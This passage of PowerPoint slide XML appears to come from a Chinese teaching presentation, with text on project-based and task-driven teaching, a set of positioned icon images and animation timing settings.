              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
